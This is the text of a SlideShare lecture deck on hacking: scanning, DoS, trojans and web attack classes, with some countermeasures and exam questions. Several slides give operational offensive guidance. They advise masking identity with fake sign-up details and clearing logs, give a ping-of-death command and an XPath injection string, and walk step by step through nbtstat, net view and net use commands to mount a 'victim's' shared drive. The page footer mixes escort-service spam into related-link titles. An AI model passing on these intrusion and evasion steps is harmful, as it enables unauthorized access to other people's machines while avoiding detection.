SlideShare uma empresa Scribd logo
1 de 63
HACKING
Team Presentation By:
ANAND KUMAR MISHRA
What is Hacking?
Hacking refers to an array of activities which are done to
intrude some one else’s personal information space so as
to use it for malicious, unwanted purposes.
Hacking is a term used to refer to activities aimed at
exploiting security flaws to obtain critical information for
gaining access to secured networks.
A Brief History of Hacking
 1980s
- Cyberspace coined
-414 arrested
-Two hacker groups formed
-2600 published
 1990s
-National Crackdown on hackers
-Kevin Mitnick arrested
-Microsoft’s NT operating system pierced
A Brief History of Hacking
 2001
– In one of the biggest denial-of-service attack, hackers
launched attacks against eBay, Yahoo!, CNN.com.,
Amazon and others.
 2007
– Bank hit by “biggest ever” hack. Swedish Bank, Nordea
recorded nearly $1 Million has been stolen in three months
from 250 customer account.
Famous Hackers in History
Ian Murphy Kevin Mitnick Johan Helsinguis
Mark AbeneLinus Torvalds Robert Morris
The Hacker Attitude
 The world is full of fascinating problems waiting to be solved
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort.
The effort takes motivation. To be a hacker you have to get a basic thrill
from solving problems, sharpening your skills, and exercising your
intelligence.
 Nobody should ever have to solve a problem twice
Creative brains are a valuable, limited resource. To behave like a hacker,
you have to believe that the thinking time of other hackers is precious --
so much so that it's almost a moral duty for you to share information,
solve problems and then give the solutions away just so other hackers
can solve new problems instead of having to perpetually re-address old
ones.
The Hacker Attitude
 Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have
to drudge at stupid repetitive work
 Freedom is good
Hackers are naturally anti-authoritarian. Anyone who can give you orders
can stop you from solving whatever problem you're being fascinated by
 Becoming a hacker will take intelligence, practice, dedication, and
hard work.
Basic Hacking Skills
 Learn how to program.
This, of course, is the fundamental hacking skill. If you don't know any
computer languages, you cant do hacking.
 Get one of the open-source Unix's and learn to use and run it
The single most important step any newbie can take towards acquiring
hacker skills is to get a copy of Linux or one of the BSD-Unix’s, install it
on a personal machine, and run it.
 Learn how to use the World Wide Web and write HTML.
To be worthwhile, your page must have content -- it must be interesting
and/or useful to other hackers.
Hacking Premeasured
 When you start hacking the first thing you need to do is: to make sure the
victim will not find out your real identity.
 So hide your IP by masking it or using a anonymous proxy server. This is
only effective when the victim has no knowledge about computers and
internet. Organizations like the F.B.I, C.I.A and such will find you in no
time, so beware !
 The best thing to do is using a dialup connection that has a variable IP
address. Be smart, when you signup for a internet dialup connection use
a fake name and address.
 When hacking never leave traces of your hacking attempts, clear log files
and make sure you are not monitored. So use a good firewall that keeps
out retaliation hacking attempts of your victim.
IP Addresses
 Every system connected to a network has a unique Internet Protocol (IP)
Address which acts as its identity on that network.
 An IP Address is a 32-bit address which is divided into four fields of 8-bits
each. For Example, 203.94.35.12
 All data sent or received by a system will be addressed from or to the
system.
 An attacker’s first step is to find out the IP Address of the target system.
IP Addresses: Finding out an IP Address
 A remote IP Address can easily be found out by any of the following
methods:
Through Instant Messaging Software
Through Internet Relay Chat
Through Your website
Through Email Headers
Finding an IP Address via Instant Messengers
 Case: If you are chatting on messengers like MSN, YAHOO etc. then
the following indirect connection exists between your system and your
friend’s system:
Your System------Chat Server---- Friend’s System
Friend’s System---------Chat Server------- Your System
Thus in this case, you first have to establish a direct connection with
your friend’s computer by either sending him a file or by using the call
feature.
Then, goto MSDOS or the command line and type:
C:>netstat -n
This command will give you the IP Address of your friend’s computer.
Finding an IP Address via Instant Messengers
Countermeasures
Do not accept File transfers or calls from unknown people
Chat online only after logging on through a Proxy Server.
A Proxy Server acts as a buffer between you and the un-trusted network
known as the Internet, hence protecting your identity.
Case: Your System-----Proxy------Chat Server------Friend’s System
Some good Proxy Servers are:
Wingate (For Windows Platform)
Squid (For Unix Platforms)
Finding an IP Address via your website
 One can easily log the IP Addresses of all visitors to their website by
using simply JAVA applets or JavaScript code.
Countermeasures
 One should surf the Internet through a Proxy Server.
 One can also make use of the numerous Free Anonymous Surfing
Proxy Services.
For Example, www.anonymizer.com
Finding an IP Address via Email Headers
 Hotmail.com along with numerous other Email Service Providers, add
the IP Address of the sender to each outgoing email.
 A Typical excerpt of such a Header of an email sent from a Hotmail
account is:
Return-Path: <XXX@hotmail.com>
Received: from hotmail.com by sbcglobal.net
(8.9.1/1.1.20.3/13Oct08-0620AM)
id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST)
Message-ID: <20000123133014.34531.qmail@hotmail.com>
Received: from 202.54.109.174 by www.hotmail.com with HTTP;Sun,
Sun, 12 OCT 2008 05:30:14 PST
X-Originating-IP: [202.xx.109.174]
IP Addresses: Dangers & Concerns
Dangers & Concerns
 DOS Attacks
 Disconnect from the Internet
 Trojans Exploitation
 Geographical Information
 File Sharing Exploits
NETWORK HACKING
General Hacking Methods
 A typical attacker works in the following manner:
1. Identify the target system.
2. Gathering Information on the target system.
3. Finding a possible loophole in the target system.
4. Exploiting this loophole using exploit code.
5. Removing all traces from the log files and escaping without
a trace.
Port Scanning: An Introduction
Port Scanning means to scan the target system in order to get a list of
open ports (i.e. ports listening for connections) and services running on
these open ports.
Port Scanning is normally the first step that an attacker undertakes.
Is used to get a list of open ports, services and the Operating System
running on the target system.
Can be performed easily by using different methods.
Manual Port Scanning can be performed using the famous ‘Telnet’
program.
It is often the first tell tale sign, that gives an attacker away to the system
administrator.
Port Scanning : TCP Connect Scanning
 Port Scanner establishes a full 3-way TCPIP Handshake with all ports
on the remote system. The regular 3-way TCPIP Handshake has been
depicted below:
1. Client---------SYN Packet------------- Host
2. Host-----------SYNACK Packet-------- Client
3. Client----------ACK Packet--------------- Host
 Accurate and Fastest Port Scanning Method.
Detection and Countermeasures
 Initialization and Termination of Connections on multiple ports from the
same remote IP Address.
 Only monitoring can be done. No effective countermeasure available,
without compromising on the services offered by the system.
Port Scanning: Security Threats
Port Scanning is commonly used by computer attackers to get the following
information about the target system:
List of Open Ports
Services Running
Exact Names and Versions of all the Services or Daemons.
Operating System name and version
All this information can collectively prove to be invaluable when the attacker
is actually trying to infiltrate into the target system.
Port Scanning : Major Tools Available
Some of the best and the most commonly used Port Scanners are:
 Nmap
 Superscan
 Hping
Common Features of all above Port Scanners:
 Very Easy to Use
 Display Detailed Results
The easy usability and the detailed information reports generated by
popular port scanners has led to an alarming increase in the number of
script kiddies.
Port Scanning: Counter-Attacks Strategies
Although, it is impossible to stop clients from Port Scanning your network,
however, it is advisable to take all possible measures against possible
attackers. Some useful Anti-Port Scanning software available are:
 Scanlogd (A Unix based Port Scan Detector & Logger)
 BlackICE (A Windows based Port Scan Detector & Logger)
 Snort: A packet sniffer cum IDS.
 Abacus Port sentry: Capable of Detecting both normal and stealth
port scanning attempts.
Other than the above tools, it is always advisable to disable as many
services as possible. In other words, one should try to close as many ports
as possible, without compromising on the services offered by that system.
ICMP Scanning: An Introduction
 The Internet Control Message Protocol (ICMP) is the protocol used for
reporting errors that might have occurred while transferring data
packets over networks
 Extremely Useful in Information Gathering.
 Originally, designed for network diagnosis and to find out as to what
went wrong in the data communication.
 Can be used to find out the following:
 Host Detection
 Operating System Information
 Network Topography Information
 Firewall Detection
ICMP Scanning: Host Detection Techniques
 ICMP Host Detection technique ‘ping’ command or utility.
 The ‘ping’ utility can be used to determine whether the remote host is
alive or not.
 The ping command can be used by the attacker for the following
purposes:
 Host Detection Purposes
 To clog up valuable network resources by sending infinite ‘Echo
request’ ICMP messages.
 Firewall detection
ICMP Scanning: Host Detection---Ping Example
 Below is sample output of a PING command executed on a Windows
machine:
C:WINDOWS>ping www.yahoo.com
 
Pinging www.yahoo-ht3.akadns.net [69.147.96.15] with
32 bytes of data:
 
Reply from 69.147.96.15 : bytes=32 time=163ms TTL=61
Reply from 69.147.96.15 : bytes=32 time=185ms TTL=61
Reply from 69.147.96.15 : bytes=32 time=153ms TTL=61
Reply from 69.147.96.15 : bytes=32 time=129ms TTL=61
……………
Various Types of Attacks
There are an endless number of attacks, which a system administrator
has to protect his system from. However, the most common ones are:
 Denial of Services attacks (DOS Attacks)
 Threat from Sniffing and Key Logging
 Trojan Attacks
 IP Spoofing
 Buffer Overflows
 All other types of Attacks
Denial of Services (DOS) Attacks
DOS Attacks are aimed at denying valid, legitimate Internet and Network
users access to the services offered by the target system.
In other words, a DOS attack is one in which you clog up so much
memory on the target system that it cannot serve legitimate users.
There are numerous types of Denial of Services Attacks or DOS Attacks.
DOS Attacks: Ping of Death Attack
The maximum packet size allowed to be transmitted by TCPIP on a
network is 65 536 bytes.
In the Ping of Death Attack, a packet having a size greater than this
maximum size allowed by TCPIP, is sent to the target system.
As soon as the target system receives a packet exceeding the allowable
size, then it crashes, reboots or hangs.
This attack can easily be executed by the ‘ping’ command as follows:
ping -l 65540 hostname
DOS Attacks: SMURF Attacks
 In SMURF Attacks, a huge number of Ping Requests are sent to the
Target system, using Spoofed IP Addresses from within the target
network.
 Due to infinite loops thus generated and due to the large number of
Ping Requests, the target system will crash, restart or hang up.
Threats from Sniffers and Key Loggers
 Sniffers: capture all data packets being sent across the
network in the raw form.
Commonly Used for:
 Traffic Monitoring
 Network Trouble shooting
 Gathering Information on Attacker.
 For stealing company Secrets and sensitive data.
 Commonly Available Sniffers
 tcpdump
 Ethereal
 Dsniff
Threats from Sniffers: Working & Countermeasures
 Working
Sniffers work along with the NIC, capturing all data packets in range of
the compromised system.
 Countermeasures
 Switch to Switching Networks. (Only the packets meant for that
particular host reach the NIC)
 Use Encryption Standards like SSL, SSH, IPSec.
Threats from Key Loggers
 Key loggers: Record all keystrokes made on that system and store
them in a log file, which can later automatically be emailed to the
attacker.
 Countermeasures
 Periodic Detection practices should be made mandatory.
A Typical Key Logger automatically loads itself into the memory,
each time the computer boots.
 Thus, the start up script of the Key Logger should be removed.
Trojan Attacks
 Trojans: act as a RAT or Remote Administration Tool, which allow
remote control and remote access to the attacker.
Working:
1. The Server Part of the Trojan is installed on the target system
through trickery or disguise.
2. This server part listens on a predefined port for connections.
3. The attacker connects to this Server Part using the Client part of
the Trojan on the predefined port number.
4. Once this is done, the attacker has complete control over the
target system.
Trojan Attacks: Detection and Countermeasures
 Detection & Countermeasures
 Port Scan your own system regularly.
 If you find a irregular port open, on which you usually do not have
a service running, then your system might have a Trojan installed.
 One can remove a Trojan using any normal Anti-Virus Software.
Live Example Hacking NetBIOS
What is NetBIOS?
NetBIOS (Network Basic Input/output System) was originally developed by
IBM as an Application Programming Interface (API) for client software to
access LAN resources. Since its creation, NetBIOS has become the basis
for many other networking applications. In its strictest sense, NetBIOS is an
interface specification for acessing networking services.
Step 1:
Get a IP (range) scanner. (Recommended Superscanner).
Scan the victim's IP on TCP/IP port 139.
Live Example Hacking NetBIOS:
Continue
 Step 2:
Open a DOS prompt.
Go to Start-> Run.
Type CMD and press OK.
This is what you see:
c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
Live Example Hacking NetBIOS:
Continue
 Step 2: Continue
If you see this, you are in:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------------------
User <00> UNIQUE Registered
Workgroup <00> GROUP Registered
User <03> UNIQUE Registered
User <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
If you don't get the number <20>. The victim disabled the File And Printer
Sharing, find a another victim
Live Example Hacking NetBIOS:
Continue
Step 3:
Type down:
c:windows>net view 255.255.255.255
If the output is like this:
Shared resources at 255.255.255.255
ComputerNameGoesHere
Share name Type Used as Comment
------------------------------------------------------------
CDISK Disk xxxxx xxxxx
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK
Live Example Hacking NetBIOS:
Continue
Step 4:
Type down:
You can replace x: by anything letter you want but not your own drive
letters.
CDISK is the name of the shared hard drive.
c:windows>net use x: 255.255.255.255CDISK
If the command is successful we will get the confirmation.
The command was completed successfully
Now open windows explorer or just double click on the My Computer icon
on your desktop and you will see a new network drive X:> .
Now your are a small time hacker.
Good luck.
INTERNET APPLICATION
SECURITY
Internet Application Hacking
Statistics
 WHID (Web Hacking Incident Database) annual report for 2007
67% percent of the attacks in 2007 were "for profit" motivated.
And it targeted the Web-Applications.
 Acunetix, a leading vendor of web application security
solutions, revealed that on average 70% of websites are at
serious and immediate risk of being hacked. Every 1500 lines
of code has one security vulnerability. (IBM LABS)
 3 out of 4 websites are Vulnerable to attack. (Gartner Report)
 Most popular attacks are against web server ( incident.org)
Why So Many Attacks on Web
Application???
 Mobile Application, Browser Application.
 Internet data is shared.
 24 / 7
Web Application are Three-tier
Application
Three-tier application
Overview of Internet Security
General Hacking Methods
 A typical attacker works in the following manner:
1. Identify the target system.
2. Gathering Information on the target system.
3. Finding a possible loophole in the target system.
4. Exploiting this loophole using exploit code.
5. Removing all traces from the log files and escaping without a
trace.
Fundamental Methodology to do
any Web-Application Assessment
 Foot printing
Discovery of Web application
 Profiling
 Getting Real Attack Points
 Exploit the system
 Finding the defend mechanism and approach
for them
Start With Foot Printing
 IP Address and Port as start point for
assessment- MYTH
 What if IP address is multi-hosted?
 One IP can have more application to assess.
 Finding web application running on domain.
 HOW????
2-Ways
 Host Foot printing
 Domain Foot printing.
 Both focus on Web application.
 Tools and method.
 LETS CHECK IT OUT!!!!!
DEMO
http://whois.webhosting.info/
http://whois.educause.net/index.asp
http://www.net-square.com/msnpawn/index.shtml
http://search.msn.com/developer/appids.aspx
Here we get the Id which we have to use as MSN APPID
(Follow the instruction in PDF file to run that application)
Web-Application Attributes
 Query String
 Javascript
 Cookie script
 Path to cgi-bin
 Others
Why Vulnerable?
 Poor Web Application coding
 Insecure deployment of web application
 Insufficient input validation
 No web traffic filtering
 Web application attributes are not guarded
well. For example Query String.
Web Application Security
Consortium (WASC) Statistics
Vulnerability
Checking Vulnerabilities
 http://www.acunetix.com/cross-site-scripting/Copy-scanner.htm
 Once you have vulnerabilities known, Out of the 100,000
websites scanned by Acunetix WVS, 42% were found to be
vulnerable to Cross Site Scripting. XSS is extremely dangerous
and the number of the attacks is on the rise. Hackers are
manipulating these vulnerabilities to steal organizations’
sensitive data. Can you afford to be next?
 Cross Site Scripting allows an attacker to embed malicious
JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable
dynamic page to fool the user, executing the script on his
machine in order to gather data
Classes of Attacks
 Authentication
The Authentication section covers attacks that target a web site's method of
validating the identity of a user, service or application.
 Authorization
The Authorization section covers attacks that target a web site's method of
determining if a user, service, or application has the necessary permissions to
perform a requested action.
 Client-side Attacks
The Client-side Attacks section focuses on the abuse or exploitation of a web
site's users.
 Command Execution
The Command Execution section covers attacks designed to execute remote
commands on the web site. All web sites utilize user-supplied input to fulfill
requests.
 Logical Attacks
The Logical Attacks section focuses on the abuse or exploitation of a web
application's logic flow.
Attack Techniques
(Hacking Techniques)
 Brute Force
A Brute Force attack is an automated process of trial and
error used to guess a person's username, password, credit-
card number or cryptographic key
• Cross-site Scripting
Cross-site Scripting (XSS) is an attack technique that forces
a web site to echo attacker-supplied executable code, which
loads in a user's browser.
• SQL Injection
SQL Injection is an attack technique used to exploit web
sites that construct SQL statements from user-supplied input.
• XPath Injection
XPath Injection is an attack technique used to exploit web
sites that construct XPath queries from user-supplied input.
XPath Injection
<?xml version="1.0" encoding="utf-8" ?>
<orders>
<customer id="1">
<name>Bob Smith</name>
<email> bob.smith@bobsmithinc.com </email>
<creditcard>1234567812345678</creditcard>
<order>
<item>
<quantity>1</quantity>
<price>10.00</price>
<name>Sprocket</name>
</item>
<item>
<quantity>2</quantity>
<price>9.00</price>
<name>Cog</name>
</item>
</order>
</customer>
...
</orders>
XPath Query of Previous Code
 The XPath query that the application
performs looks like this
string query = "/orders/customer[@id='" + customerId +
"']/order/item[price >= '" + priceFilter + "']";
Hacking XPath Injection Query
string query = "/orders/customer[@id=''] | /*
| /foo[bar='']/order/item[price >= '" +
priceFilter + "']";
BIBLIOGRAPHY
http://www.linuxhaxor.net/2007/08/21/top-10-black-hat-hackers/
http://www.acunetix.com/cross-site-scripting/Copy-scanner.htm
http://whois.webhosting.info/
http://whois.educause.net/index.asp
http://search.msn.com/developer/appids.aspx
http://www.cisco.com/
http://www.wikihow.com/Hack
http://www.webappsec.org/projects/whid/statistics.shtml
http://www.acunetix.com/news/security-audit-results.htm
http://www.net-square.com/msnpawn/index.shtml
QUESTIONS
&
COMMENTS
QUESTIONS FOR EXAMS
Q) Discuss general hacking method?
Ans:
 Identify the target system.
 Gathering Information on the target system.
 Finding a possible loophole in the target system.
 Exploiting this loophole using exploit code.
 Removing all traces from the log files and escaping without a trace
Q) If we have IP address and a port, we can do web assessment for
all web application.
(Agree/Disagree) Give Reason.
Ans:
Disagree
What if IP is hosted in multi-hosted framework?

Mais conteúdo relacionado

Mais procurados

Module 2 Foot Printing
Module 2   Foot PrintingModule 2   Foot Printing
Module 2 Foot Printingleminhvuong
 
Module 4 Enumeration
Module 4   EnumerationModule 4   Enumeration
Module 4 Enumerationleminhvuong
 
Honeypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat CommunityHoneypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat Communityamiable_indian
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigationsMukesh Chaudhari
 
Ceh v5 module 10 session hijacking
Ceh v5 module 10 session hijackingCeh v5 module 10 session hijacking
Ceh v5 module 10 session hijackingVi Tính Hoàng Nam
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHackingAve Nawsh
 
Password sniffing
Password sniffingPassword sniffing
Password sniffingSRIMCA
 
Internet security
Internet securityInternet security
Internet securitygohel
 
Operating System Fingerprinting Prevention
Operating System Fingerprinting PreventionOperating System Fingerprinting Prevention
Operating System Fingerprinting Preventiondcalhoun1984
 

Mais procurados (20)

Session hijacking
Session hijackingSession hijacking
Session hijacking
 
Module 2 Foot Printing
Module 2   Foot PrintingModule 2   Foot Printing
Module 2 Foot Printing
 
CMIT 321 QUIZ 1
CMIT 321 QUIZ 1CMIT 321 QUIZ 1
CMIT 321 QUIZ 1
 
Module 4 Enumeration
Module 4   EnumerationModule 4   Enumeration
Module 4 Enumeration
 
Honeypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat CommunityHoneypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat Community
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigations
 
Hacking
HackingHacking
Hacking
 
ip spoofing
ip spoofingip spoofing
ip spoofing
 
Ceh v5 module 10 session hijacking
Ceh v5 module 10 session hijackingCeh v5 module 10 session hijacking
Ceh v5 module 10 session hijacking
 
Network security
Network securityNetwork security
Network security
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanning
 
Ip Spoofing
Ip SpoofingIp Spoofing
Ip Spoofing
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hacking
 
Password sniffing
Password sniffingPassword sniffing
Password sniffing
 
Internet security
Internet securityInternet security
Internet security
 
Sniffing via dsniff
Sniffing via dsniffSniffing via dsniff
Sniffing via dsniff
 
Operating System Fingerprinting Prevention
Operating System Fingerprinting PreventionOperating System Fingerprinting Prevention
Operating System Fingerprinting Prevention
 
Best!
Best!Best!
Best!
 
OS Fingerprinting
OS FingerprintingOS Fingerprinting
OS Fingerprinting
 

Semelhante a Hacking In Detail

HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTDHRUV562167
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingsxkkjbzq2k
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria GrunickHacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunickamiable_indian
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primeramiable_indian
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical HackingSripati Mahapatra
 

Semelhante a Hacking In Detail (20)

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
 
31.ppt
31.ppt31.ppt
31.ppt
 
31.ppt
31.ppt31.ppt
31.ppt
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
 
hacking
hackinghacking
hacking
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Hacking
HackingHacking
Hacking
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria GrunickHacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunick
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primer
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
 

Mais de Greater Noida Institute Of Technology

Mais de Greater Noida Institute Of Technology (20)

Airline Analysis of Data Using Hadoop
Airline Analysis of Data Using HadoopAirline Analysis of Data Using Hadoop
Airline Analysis of Data Using Hadoop
 
College Administration Management System
College Administration Management System College Administration Management System
College Administration Management System
 
Web security
Web securityWeb security
Web security
 
Virtual Private Network
Virtual Private NetworkVirtual Private Network
Virtual Private Network
 
Viruses worms
Viruses wormsViruses worms
Viruses worms
 
Spoofing
SpoofingSpoofing
Spoofing
 
Sentimental Analysis of twitter data .
Sentimental Analysis of twitter data .Sentimental Analysis of twitter data .
Sentimental Analysis of twitter data .
 
Hacking Question and Answer
Hacking Question and Answer Hacking Question and Answer
Hacking Question and Answer
 
Security tools
Security toolsSecurity tools
Security tools
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
BroadBand Over powerline .
BroadBand Over powerline .BroadBand Over powerline .
BroadBand Over powerline .
 
Modern Networking Hacking
Modern Networking HackingModern Networking Hacking
Modern Networking Hacking
 
Network security
Network securityNetwork security
Network security
 
Lifi Technology
Lifi TechnologyLifi Technology
Lifi Technology
 
Hack wireless internet connections or wifi
Hack wireless internet connections or wifiHack wireless internet connections or wifi
Hack wireless internet connections or wifi
 
Hacking step (Methodology)
Hacking step (Methodology)Hacking step (Methodology)
Hacking step (Methodology)
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
How to become Hackers .
How to become Hackers .How to become Hackers .
How to become Hackers .
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Cyber crime and Security
Cyber crime and SecurityCyber crime and Security
Cyber crime and Security
 

Último

Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Dr.Costas Sachpazis
 
OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...
OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...
OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...Soham Mondal
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordAsst.prof M.Gokilavani
 
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur EscortsCall Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxpranjaldaimarysona
 
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130
VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130
VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130Suhani Kapoor
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Christo Ananth
 
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By  Team Orange (Dept. of Pharmacy)Software Development Life Cycle By  Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Suman Mia
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performancesivaprakash250
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
